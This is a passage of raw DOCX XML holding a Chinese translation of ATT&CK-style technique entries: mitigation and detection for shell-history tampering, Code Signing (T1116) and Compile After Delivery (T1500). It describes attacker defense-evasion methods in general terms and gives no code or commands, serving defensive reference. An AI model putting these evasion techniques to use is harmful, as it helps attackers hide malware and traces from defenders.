              <w:t>环境变量权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11771A6C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>将关联的环境变量设置为只读可以确保保留历史记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1CBDA02C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B65BF14" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19604181" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>阻止用户删除或写入某些文件，防止攻击者恶意更改他们的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>~/.bash_history</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31B67534" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBB0EBA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630D050" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>身份认证时，尤其</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的远程终端服务来做身份</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>认证时</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>目录里没有新条目是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此外，修改环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>HISTFILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>HISTFILESIZE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件都可能表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>活动发生</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B43F44" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码签名</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="789C72E7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32EBE201" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1116</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E4A1316" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ACAFADA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78063816" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>文件元数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21A29B5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>账号控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="762EB32B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24F0F28B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A958441" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代码签名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>给</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发人员的二进制文件提供了真实性级别，它</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件未被篡改的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>保证</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。然而，众所周知，攻击者会使用代码签名证书将恶意软件和工具伪装为合法的二进制文件。操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中使用的证书可能是由</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>者制作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或窃取的。时下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>acOS/OS X</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>软件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首次运行时验证其代码签名。由于平台的分散性特征，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统没有此功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF8F92" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码签名证书可用于绕过要求在系统上执行签名代码的安全策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B33CBB3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1A6EF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1ED006" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F19B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集并分析环境中执行的软件上的签名证书元数据，查找异常证书特征和异常值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53299F40" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交付后编译</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="745FA555" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ECF2F11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002F240D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:t xml:space="preserve"> T1500</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D4D90B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B4B755" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002F240D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:t>Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56EA1A69" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002F240D">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编译器软件（原产于系统或由攻击者交付）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E040283" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002F240D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE149A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002F240D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00736893">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数，进程监控，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD3ABCB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>静态文件分析、二进制分析、防病毒、主机入侵防御系统、基于签名的检测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16724498" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002F240D">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:t>: Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank; Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38BE3763" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002F240D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="002F240D">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14569BF4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="59A98CAC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可能会尝试通过将文件作为未编译的代码交付给受害者，使有效负载难以发现和分析。与</w:t>
      </w:r>
      <w:r w:rsidRPr="002F240D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>模糊文件或信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>类似，基于文本的源代码文件可能会破坏针对可执行文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>二进制文件的保护的分析和审查。这些负载需要在执行之前进行编译；通常通过本机实用程序，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> csc.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> GCC/MinGW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588682B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>源代码负载也可以加密、编码和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或嵌入到其他文件中，例如作为</w:t>
      </w:r>
      <w:r w:rsidRPr="002F240D">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Spearphish </w:t>
      </w:r>
      <w:r w:rsidRPr="002F240D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>附件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>提供的文件。有效负载也可以以无法识别的格式交付给本机操作系统（例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS/Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
